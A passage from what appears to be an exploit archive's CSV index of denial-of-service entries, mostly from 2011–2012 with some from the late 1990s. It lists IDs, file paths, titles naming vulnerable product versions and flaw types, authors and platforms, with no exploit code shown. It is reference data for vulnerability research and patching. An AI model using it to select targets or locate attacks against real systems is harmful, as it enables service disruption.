Denial of Service",2011-11-25,"Jane Doe",linux,dos, -18165,exploits/windows/dos/18165.txt,"siemens automation license manager 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos, -18166,exploits/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos, -18173,exploits/windows/dos/18173.pl,"Bugbear FlatOut 2005 - '.bed' File Buffer Overflow",2011-11-30,Silent_Dream,windows,dos, -18188,exploits/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",windows,dos, -18200,exploits/windows/dos/18200.txt,"SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)",2011-12-05,LiquidWorm,windows,dos, -18196,exploits/windows/dos/18196.py,"NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass)",2011-12-03,Zune,windows,dos, -18199,exploits/hardware/dos/18199.pl,"ShareCenter D-Link DNS-320 - Remote reboot/shutdown/reset (Denial of Service)",2011-12-05,rigan,hardware,dos, -18220,exploits/windows/dos/18220.py,"CyberLink (Multiple Products) - File Project Handling Stack Buffer Overflow (PoC)",2011-12-09,modpr0be,windows,dos, -18221,exploits/linux/dos/18221.c,"Apache - Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos, -18223,exploits/windows/dos/18223.pl,"Free Opener - Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos, -18225,exploits/linux/dos/18225.c,"CSF Firewall - Buffer Overflow",2011-12-09,"FoX HaCkEr",linux,dos, -18257,exploits/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos, -18254,exploits/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos, -18256,exploits/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos, -18268,exploits/windows/dos/18268.txt,"freeSSHd - Denial of Service (PoC)",2011-12-24,Level,windows,dos, -18269,exploits/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service",2011-12-24,Level,windows,dos, -18270,exploits/windows/dos/18270.py,"Putty 0.60 - Crash (PoC)",2011-12-24,Level,windows,dos, -18271,exploits/windows/dos/18271.py,"Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service",2011-12-24,Level,windows,dos, -18272,exploits/windows/dos/18272.py,"Microsoft Windows Explorer - Denial of Service",2011-12-24,Level,windows,dos, -18275,exploits/win_x86-64/dos/18275.txt,"Apple Safari - GdiDrawStream Blue Screen of Death",2011-12-18,webDEViL,win_x86-64,dos, -18278,exploits/linux/dos/18278.txt,"Nagios Plugins check_ups - Local Buffer Overflow (PoC)",2011-12-26,"Stefan Schurtz",linux,dos, -18285,exploits/windows/dos/18285.py,"VideoLAN VLC Media Player 1.1.11 - libav 'libavcodec_plugin.dll' Denial of Service",2011-12-28,"Mitchell Adair",windows,dos, -18295,exploits/linux/dos/18295.txt,"lighttpd - Denial of Service (PoC)",2011-12-31,pi3,linux,dos, -18296,exploits/php/dos/18296.txt,"PHP 5.3.8 - Hashtables Denial of Service",2012-01-01,infodox,php,dos, -19024,exploits/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta - Remote Format String Overflow",2012-06-08,demonalex,windows,dos, -18305,exploits/php/dos/18305.py,"PHP Hash Table Collision - Denial of Service (PoC)",2012-01-03,"Christian Mehlmauer",php,dos, -18309,exploits/windows/dos/18309.pl,"VideoLAN VLC Media Player 1.1.11 - '.amr' Denial of Service (PoC)",2012-01-04,Fabi@habsec,windows,dos, -18318,exploits/windows/dos/18318.py,"Netcut 2.0 - Denial of Service",2012-01-04,MaYaSeVeN,windows,dos, -18977,exploits/php/dos/18977.php,"PHP 5.3.10 - 'spl_autoload_register()' Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos, -18978,exploits/php/dos/18978.php,"PHP 5.3.10 - 'spl_autoload_call()' Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos, -18327,exploits/netware/dos/18327.txt,"Novell Netware - XNFS.NLM NFS Rename Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos, -18328,exploits/netware/dos/18328.txt,"Novell Netware - XNFS.NLM STAT Notify Remote Code Execution",2012-01-06,"Francis Provencher",netware,dos, -18336,exploits/hardware/dos/18336.pl,"AirTies-4450 - Unauthorized Remote Reboot (Denial of Service)",2012-01-08,rigan,hardware,dos, -18337,exploits/windows/dos/18337.pl,"M-Player 0.4 - Local Denial of Service",2012-01-08,JaMbA,windows,dos, -18339,exploits/windows/dos/18339.py,"GPSMapEdit 1.1.73.2 - '.lst' Local Denial of Service",2012-01-09,"Julien Ahrens",windows,dos, -18351,exploits/netware/dos/18351.txt,"Novell Netware - XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos, -18370,exploits/multiple/dos/18370.txt,"PHP 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos, -18378,exploits/linux/dos/18378.c,"Linux 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,linux,dos, -18976,exploits/php/dos/18976.php,"PHP 5.3.10 - 'spl_autoload()' Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos, -18399,exploits/windows/dos/18399.py,"VideoLAN VLC Media Player 1.2.0 - 'libtaglib_pluggin.dll' Denial of Service",2012-01-20,"Mitchell Adair",windows,dos, -18698,exploits/windows/dos/18698.py,"Xion Audio Player 1.0.127 - '.aiff' Denial of Service",2012-04-04,condis,windows,dos, -18427,exploits/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 - 'pdfxctrl.dll' Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos, -18436,exploits/linux/dos/18436.txt,"sudo 1.8.0 < 1.8.3p1 - Format String",2012-01-31,joernchen,linux,dos, -18440,exploits/windows/dos/18440.txt,"EdrawSoft Office Viewer Component ActiveX 5.6 - 'officeviewermme.ocx' Buffer Overflow (PoC)",2012-01-31,LiquidWorm,windows,dos, -18453,exploits/windows/dos/18453.txt,"OfficeSIP Server 3.1 - Denial of Service",2012-02-02,"SecPod Research",windows,dos, -18454,exploits/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service",2012-02-02,"SecPod Research",windows,dos, -18457,exploits/linux/dos/18457.py,"torrent-stats - 'httpd.c' Denial of Service",2012-02-03,otr,linux,dos, -18458,exploits/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 - htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos, -18460,exploits/php/dos/18460.php,"PHP 5.4.0RC6 (x64) - Denial of Service",2012-02-04,"Stefan Esser",php,dos, -18461,exploits/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service",2012-02-04,"Senator of Pirates",windows,dos, -18463,exploits/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",windows,dos, -18469,exploits/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service Vulnerabilities",2012-02-07,"Balazs Makany",windows,dos, -18475,exploits/windows/dos/18475.c,"PeerBlock 1.1 - Blue Screen of Death",2012-02-09,shinnai,windows,dos, -18481,exploits/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",windows,dos, -18488,exploits/windows/dos/18488.txt,"Novell Groupwise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 -18489,exploits/windows/dos/18489.txt,"Novell Groupwise Messenger 2.1.0 - Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 -18490,exploits/windows/dos/18490.txt,"Novell Groupwise Messenger Client 2.1.0 - Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos, -18491,exploits/windows/dos/18491.txt,"xnview 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos, -18493,exploits/windows/dos/18493.py,"pcAnywhere 12.5.0 build 463 - Denial of Service",2012-02-17,"Johnathan Norman",windows,dos, -18507,exploits/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow (PoC)",2012-02-22,"Julien Ahrens",windows,dos, -18512,exploits/windows/dos/18512.txt,"Unity 3D Web Player 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos, -18524,exploits/windows/dos/18524.py,"Tiny HTTP Server 1.1.9 - Remote Crash (PoC)",2012-02-25,localh0t,windows,dos, -18541,exploits/windows/dos/18541.py,"Netmechanica NetDecision HTTP Server - Denial of Service",2012-02-29,"SecPod Research",windows,dos, -18546,exploits/windows/dos/18546.txt,"Novell Groupwise - Address Book Remote Code Execution",2012-03-01,"Francis Provencher",windows,dos, -18552,exploits/windows/dos/18552.pl,"Passport PC To Host - '.zws' File Memory Corruption",2012-03-03,Silent_Dream,windows,dos, -18600,exploits/multiple/dos/18600.txt,"presto! pagemanager 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos, -18601,exploits/multiple/dos/18601.txt,"EMC NetWorker 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos, -18579,exploits/linux/dos/18579.txt,"PyPAM Python bindings for PAM - Double-Free Corruption",2012-03-10,"Markus Vervier",linux,dos, -18584,exploits/windows/dos/18584.txt,"GOM Media Player 2.1.37 - Buffer Overflow",2012-03-12,longrifle0x,windows,dos, -18586,exploits/windows/dos/18586.txt,"XnView FlashPix Image Processing - Heap Overflow",2012-03-12,"Francis Provencher",windows,dos, -18587,exploits/windows/dos/18587.py,"Network Instrument Observer - SNMP SetRequest Denial of Service",2012-03-12,"Francis Provencher",windows,dos, -18602,exploits/windows/dos/18602.txt,"Epson EventManager 2.50 - Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos, -18606,exploits/windows/dos/18606.txt,"Microsoft Terminal Services - Use-After-Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos, -18705,exploits/hardware/dos/18705.txt,"Sony Bravia - Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",hardware,dos, -18628,exploits/windows/dos/18628.py,"PeerFTP Server 4.01 - Remote Crash (PoC)",2012-03-20,localh0t,windows,dos, -18629,exploits/windows/dos/18629.py,"Tiny Server 1.1.9 - HEAD Denial of Service",2012-03-20,"brock haun",windows,dos, -18630,exploits/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote Denial of Service",2012-03-20,G13,android,dos, -18633,exploits/windows/dos/18633.txt,"Adobe Photoshop 12.1 - '.tiff' Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos, -18636,exploits/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - '.TMD' File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos, -18637,exploits/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Memory Corruption",2012-03-21,LiquidWorm,windows,dos, -18641,exploits/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos, -18643,exploits/windows/dos/18643.py,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow",2012-03-22,"Julien Ahrens",windows,dos, -18654,exploits/windows/dos/18654.txt,"Spotify 0.8.2.610 - search func Memory Exhaustion",2012-03-23,LiquidWorm,windows,dos, -18661,exploits/windows/dos/18661.txt,"RealPlayer - '.mp4' file handling memory Corruption",2012-03-24,"Senator of Pirates",windows,dos, -18665,exploits/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server - Denial of Service (PoC)",2012-03-25,ls,multiple,dos, -18671,exploits/windows/dos/18671.pl,"KnFTPd 1.0.0 - 'FEAT' Denial of Service (PoC)",2012-03-28,"Stefan Schurtz",windows,dos, -18717,exploits/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflows",2012-04-08,Vulnerability-Lab,windows,dos, -18688,exploits/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos, -18691,exploits/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos, -18692,exploits/linux/dos/18692.rb,"SnackAmp 3.1.3 - '.aiff' Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos, -18719,exploits/windows/dos/18719.pl,"Play [EX] 2.1 - '.M3U'/'.PLS'/'.LST' Playlist File Denial of Service",2012-04-08,Death-Shadow-Dark,windows,dos, -18771,exploits/windows/dos/18771.txt,"SumatraPDF 2.0.1 - '.chm' / '.mobi' Memory Corruption",2012-04-23,shinnai,windows,dos, -18734,exploits/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - Denial of Service",2012-04-12,"Luigi Auriemma",hardware,dos, -18739,exploits/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos, -18751,exploits/hardware/dos/18751.txt,"Samsung D6000 TV - Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos, -18754,exploits/multiple/dos/18754.php,"LibreOffice 3.5.2.2 - Memory Corruption",2012-04-19,shinnai,multiple,dos, -18755,exploits/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS11-046)",2012-04-19,fb1h2s,windows,dos, -18756,exploits/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos, -18757,exploits/windows/dos/18757.txt,"VideoLAN VLC Media Player 2.0.1 - '.mp4' Crash (PoC)",2012-04-19,"Senator of Pirates",windows,dos, -18758,exploits/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' Null Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos, -18765,exploits/windows/dos/18765.txt,"Samsung NET-i ware 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos, -18774,exploits/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 - Buffer Overflow",2012-04-23,shinnai,windows,dos, -18776,exploits/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,windows,dos, -18777,exploits/windows/dos/18777.txt,"Microsoft .NET Framework EncoderParameter - Integer Overflow (MS12-025)",2012-04-24,"Akita Software Security",windows,dos, -18799,exploits/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",windows,dos, -18795,exploits/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - '.mp4' Denial of Service",2012-04-27,"Senator of Pirates",windows,dos, -18816,exploits/windows/dos/18816.py,"LAN Messenger 1.2.28 - Denial of Service",2012-05-01,"Julien Ahrens",windows,dos, -18817,exploits/hardware/dos/18817.py,"Mikrotik Router - Denial of Service",2012-05-01,PoURaN,hardware,dos, -18819,exploits/windows/dos/18819.cpp,"Microsoft Windows XP - 'win32k.sys' Local Kernel Denial of Service",2012-05-02,"Lufeng Li",windows,dos, -18864,exploits/windows/dos/18864.txt,"QNX phrelay/phindows/phditto - Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos, -18851,exploits/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - '.gpx' Crash (PoC)",2012-05-09,condis,windows,dos, -18852,exploits/windows/dos/18852.txt,"DecisionTools SharpGrid - ActiveX Control Remote Code Execution",2012-05-09,"Francis Provencher",windows,dos, -18853,exploits/windows/dos/18853.txt,"SAP NetWeaver Dispatcher - Multiple Vulnerabilities",2012-05-09,"Core Security",windows,dos, -18855,exploits/linux/dos/18855.txt,"Asterisk - 'ast_parse_digest()' Stack Buffer Overflow",2012-03-15,"Russell Bryant",linux,dos, -18879,exploits/windows/dos/18879.rb,"MultiMedia Builder 4.9.8 - '.mef' Denial of Service",2012-05-15,"Ahmed Elhady Mohamed",windows,dos, -18877,exploits/multiple/dos/18877.txt,"FlexNet License Server Manager - Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",multiple,dos, -18878,exploits/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos, -18890,exploits/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos, -18909,exploits/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos, -18894,exploits/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos, -18902,exploits/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos, -18903,exploits/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos, -18910,exploits/php/dos/18910.php,"PHP 5.4.3 - 'com_event_sink' Denial of Service",2012-05-21,condis,php,dos, -18916,exploits/windows/dos/18916.txt,"Symantec End Point Protection 11.x / Symantec Network Access Control 11.x - Local Code Execution (PoC)",2012-05-23,41.w4r10r,windows,dos, -18918,exploits/multiple/dos/18918.txt,"Wireshark - DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos, -18919,exploits/multiple/dos/18919.txt,"Wireshark - Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",multiple,dos, -18920,exploits/multiple/dos/18920.txt,"Wireshark - Misaligned Memory Denial of Service",2012-05-24,"Klaus Heckelmann",multiple,dos, -18926,exploits/windows/dos/18926.php,"bsnes 0.87 - Local Denial of Service",2012-05-25,"Yakir Wizman",windows,dos, -18931,exploits/ios/dos/18931.rb,"Apple iOS 5.1.1 Safari Browser - 'JS match()' / 'search()' Crash (PoC)",2012-05-25,"Alberto Ortega",ios,dos, -18945,exploits/windows/dos/18945.txt,"WinRadius Server 2009 - Denial of Service",2012-05-29,demonalex,windows,dos, -18946,exploits/windows/dos/18946.txt,"TFTPD32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,windows,dos, -18940,exploits/windows/dos/18940.php,"LibreOffice 3.5.3 - '.rtf' FileOpen Crash",2012-05-28,shinnai,windows,dos, -18952,exploits/windows/dos/18952.txt,"Microsoft Wordpad 5.1 - '.doc' Null Pointer Dereference",2012-05-30,condis,windows,dos, -18956,exploits/windows/dos/18956.c,"GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow",2012-05-31,"Joseph Sheridan",windows,dos, -18958,exploits/windows/dos/18958.html,"Sony VAIO Wireless Manager 4.0.0.0 - Buffer Overflow",2012-05-31,"High-Tech Bridge SA",windows,dos, -18962,exploits/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos, -18964,exploits/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos, -18972,exploits/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos, -19000,exploits/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,windows,dos, -19034,exploits/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,windows,dos, -19046,exploits/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos, -19049,exploits/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos, -19064,exploits/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",hardware,dos, -19075,exploits/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service",1998-04-10,Schlossnagle,linux,dos, -19076,exploits/linux/dos/19076.txt,"Apple Personal Web Sharing 1.1 - Remote Denial of Service",1998-04-10,"Netstat Webmaster",linux,dos, -19082,exploits/linux/dos/19082.txt,"AMD K6 Processor - Denial of Service",1998-06-01,Poulot-Cazajous,linux,dos, -19085,exploits/linux/dos/19085.c,"Linux Kernel 2.0/2.1 - Send a SIGIO Signal To Any Process",1998-06-30,"David Luyer",linux,dos, -19089,exploits/windows/dos/19089.txt,"Microsoft Windows OpenType Font - File Format Denial of Service",2012-06-12,Cr4sh,windows,dos, -19098,exploits/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos, -19103,exploits/linux/dos/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,dos, -19385,exploits/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos, -19117,exploits/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos, -19130,exploits/freebsd/dos/19130.c,"FreeBSD 3.0 - UNIX-domain Panic (Denial of Service)",1999-05-05,"Lukasz Luzar",freebsd,dos, -19137,exploits/hardware/dos/19137.rb,"Wyse - Unauthenticated Machine Remote Power Off (Denial of Service) (Metasploit)",2012-06-14,it.solunium,hardware,dos, -19413,exploits/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos, -19391,exploits/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos, -19392,exploits/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos, -19161,exploits/solaris/dos/19161.txt,"Solaris 2.5.1 - 'Ping' System Panic (Denial of Service)",1997-06-15,"Adam Caldwell",solaris,dos, -19181,exploits/windows/dos/19181.txt,"XnView - '.RAS' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos, -19182,exploits/windows/dos/19182.txt,"XnView - '.ECW' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos, -19183,exploits/windows/dos/19183.txt,"XnView - '.FlashPix' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos, -19184,exploits/windows/dos/19184.pl,"Karafun Player 1.20.86 - '.m3u' Crash (PoC)",2012-06-16,Styxosaurus,windows,dos, -19389,exploits/windows/dos/19389.txt,"Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos, -19388,exploits/windows/dos/19388.py,"Kingview Touchview 6.53 - EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 -19207,exploits/windows/dos/19207.txt,"Microsoft Outlook Express 4.27.3110/4.72.3120 - POP Denial of Service",1999-05-11,"Miquel van Smoorenburg",windows,dos, -19212,exploits/multiple/dos/19212.txt,"Behold! Software Web Page Counter 2.7 - Denial of Service",1999-05-19,"David Litchfield",multiple,dos, -19225,exploits/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0 / Insight Management Agents 4.21 A/4.22 A/4.30 A / Intelligent Cluster Administrator 1.0 / Management Agents for Workstations 4.20 A / Server Management Agents 4.23 / Survey Utility 2.0 - Web File Access",1999-05-25,"Master Dogen",multiple,dos, -19228,exploits/multiple/dos/19228.pl,"Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA",1999-05-25,"J. Abreu Junior",multiple,dos, -19230,exploits/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service",1999-05-11,"Chris Radigan",multiple,dos, -19238,exploits/windows/dos/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - Denial of Service Duplicate Hostname",1999-06-04,"Carl Byington",windows,dos, -19241,exploits/linux/dos/19241.c,"Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / SuSE Linux 6.1) - IP Options",1999-06-01,"Piotr Wilkin",linux,dos, -19250,exploits/linux/dos/19250.txt,"Linux Kernel 2.0/2.1/2.2 - 'autofs' Denial of Service",1999-02-19,"Brian Jones",linux,dos, -19265,exploits/windows/dos/19265.py,"Total Video Player 1.31 - '.m3u' Crash (PoC)",2012-06-18,0dem,windows,dos, -19271,exploits/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port Denial of Service",1999-01-19,"David Schwartz",linux,dos, -19272,exploits/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot (Denial of Service)",1999-01-26,"Dan Burcaw",linux,dos, -19278,exploits/hp-ux/dos/19278.pl,"HP HP-UX 10.20 / IBM AIX 4.1.5 - 'connect()' Denial of Service",1997-03-05,"Cahya Wirawan",hp-ux,dos, -19282,exploits/linux/dos/19282.c,"Linux Kernel 2.0 Sendmail - Denial of Service",1999-05-28,"Michal Zalewski",linux,dos, -19289,exploits/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - Null Pointer Dereference",2012-06-19,"Luigi Auriemma",windows,dos, -19290,exploits/multiple/dos/19290.txt,"Airlock WAF 4.2.4 - Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos, -19301,exploits/linux/dos/19301.c,"Linux Kernel 2.0.33 - IP Fragment Overlap",1998-04-17,"Michal Zalewski",linux,dos, -19308,exploits/linux/dos/19308.c,"Linux Kernel 2.0/2.0.33 - i_count Overflow (PoC)",1998-01-14,"Aleph One",linux,dos, -19410,exploits/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow Denial of Service",1999-02-22,Prizm,windows,dos, -19326,exploits/solaris/dos/19326.txt,"Sun Solaris 7.0 - 'procfs' Denial of Service",1999-03-09,"Toomas Soome",solaris,dos, -19328,exploits/windows/dos/19328.txt,"Qutecom SoftPhone 2.2.1 - Heap Overflow Crash (Denial of Service) PoC)",2012-06-22,"Debasish Mandal",windows,dos, -19331,exploits/windows/dos/19331.txt,"ACDSee PRO 5.1 - '.RLE' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos, -19332,exploits/windows/dos/19332.txt,"ACDSee PRO 5.1 - '.PCT' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos, -19333,exploits/windows/dos/19333.txt,"ACDSee PRO 5.1 - '.gif' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos, -19334,exploits/windows/dos/19334.txt,"ACDSee PRO 5.1 - '.CUR' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos, -19335,exploits/windows/dos/19335.txt,"XnView 1.98.8 - '.gif' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos, -19336,exploits/windows/dos/19336.txt,"XnView 1.98.8 - '.PCT' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos, -19337,exploits/windows/dos/19337.txt,"XnView 1.98.8 - '.tiff' Image Processing Heap Overflow (1)",2012-06-22,"Francis Provencher",windows,dos, -19338,exploits/windows/dos/19338.txt,"XnView 1.98.8 - '.tiff' Image Processing Heap Overflow (2)",2012-06-22,"Francis Provencher",windows,dos, -19340,exploits/windows/dos/19340.txt,"Lattice Diamond Programmer 1.4.2 - Buffer Overflow",2012-06-22,"Core Security",windows,dos, -19357,exploits/irix/dos/19357.sh,"SGI IRIX 6.2 - SpaceWare",1996-10-30,"J.A. Guitierrez",irix,dos, -19368,exploits/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes - SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",multiple,dos, -19372,exploits/windows/dos/19372.txt,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 - Null Session Admin Name",1999-06-28,"J D Glaser",windows,dos, -19382,exploits/multiple/dos/19382.txt,"Ipswitch IMail 5.0 - Whois32 Daemon Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",multiple,dos, -19377,exploits/multiple/dos/19377.txt,"Ipswitch IMail 5.0 - Imapd Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",multiple,dos, -19378,exploits/multiple/dos/19378.txt,"Ipswitch IMail 5.0 - LDAP Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",multiple,dos, -19379,exploits/multiple/dos/19379.txt,"Ipswitch IMail 5.0 - IMonitor Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",multiple,dos, -19380,exploits/multiple/dos/19380.txt,"Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",multiple,dos, -19393,exploits/windows/dos/19393.py,"Able2Doc and Able2Doc Professional 6.0 - Memory 